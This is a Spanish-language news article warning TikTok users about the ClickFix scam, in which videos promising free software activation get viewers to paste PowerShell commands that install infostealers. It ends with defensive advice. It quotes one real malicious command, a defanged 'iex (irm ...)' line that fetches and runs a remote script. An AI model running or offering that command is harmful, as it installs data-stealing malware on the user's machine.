Alertan por estafa viral en TikTok que instala virus incluso sin descargar archivos

Se trata de contenidos que prometen activar programas de pago gratuitamente, pero llevan a las personas a ejecutar comandos que roban sus datos.

Una nueva ola de estafas dirigida a usuarios de TikTok ha encendido las alertas de la comunidad de ciberseguridad: videos cortos que prometen activar o “arreglar” software de pago a coste cero llevan a víctimas a ejecutar comandos que, en segundos, comprometen sus equipos.

(Lea también: “Recibiste transferencia”: advierten a usuarios de Bre-B por mensaje para estafarlos)

La táctica forma parte de una familia de fraudes conocida como ClickFix y ha sido documentada por investigadores del SANS Internet Storm Center y múltiples empresas de seguridad.

Los videos —breves, estilizados y con instrucciones fáciles— invitan al espectador a copiar y pegar un comando en herramientas del sistema (por ejemplo, PowerShell en Windows o la ventana Ejecutar). A simple vista parecen “atajos” o activadores para programas como Photoshop, Spotify o Windows, pero en realidad esos comandos contactan a servidores remotos que descargan y ejecutan scripts maliciosos en el dispositivo. No hay descarga visible de un fichero: basta con pegar la línea de texto sugerida para que el código se ejecute. Un ejemplo real difundido por los analistas muestra un comando que aparenta activar Photoshop pero que en la práctica invoca contenido remoto y lanza otro script: iex (irm slmgr[.]win/photoshop) — una instrucción que, al ejecutarse, puede traer y correr código dañino.

Según los análisis, los scripts instalados suelen ser infostealers (software que roba contraseñas, cookies y datos de navegadores), o puertas traseras que abren el sistema a cargas adicionales —lo que puede derivar en robo de credenciales, fraude financiero y pérdida de privacidad. En algunos reportes se menciona que variantes recientes han distribuido familias como Aura Stealer y otras herramientas que exfiltran información sensible.

¿Por qué es tan efectivo este método?

ClickFix explota la confianza y la urgencia: los contenidos parecen “truquitos” técnicos fáciles y la gente está habituada a copiar-pegar soluciones rápidas encontradas en redes. Además, al requerir la interacción directa del usuario (pegar y ejecutar un comando), el ataque puede evadir muchas defensas automáticas y filtros que detectan descargas o enlaces maliciosos.

Investigadores del SANS Internet Storm Center documentaron casos concretos en TikTok y publicaron un análisis sobre cómo los videos promueven líneas de PowerShell que terminan comprometiendo máquinas. Empresas de seguridad y medios especializados —entre ellos Bitdefender, TechRadar y Cybernews— han publicado advertencias y análisis que confirman la propagación de la campaña en las últimas semanas.

• No pegue ni ejecute comandos que encuentre en redes sociales o foros, por inofensivos que parezcan.
• Nunca abra PowerShell, Terminal o Ejecutar por instrucciones de videos o mensajes de desconocidos.
• Mantenga sistema operativo y antivirus actualizados; algunos ataques modernos aún así exigen interacción del usuario, pero las actualizaciones reducen el riesgo general.
• Verifique la fuente: si un “truco” parece demasiado bueno, búsquelo en fuentes oficiales o en sitios de seguridad reconocidos antes de probarlo.
• Si cree que ejecutó algo sospechoso, desconecte el equipo de la red y busque asistencia profesional para análisis forense o restauración.

La campaña ClickFix es un recordatorio de que la ingeniería social sigue siendo el vector preferido por los delincuentes: no siempre se necesita un archivo adjunto o un enlace malicioso visible. La sencillez del “copia-pega” es su mayor arma. Usuarios y creadores de contenido deben extremar precauciones: un tutorial viral no vale la pérdida de contraseñas, cuentas o datos personales.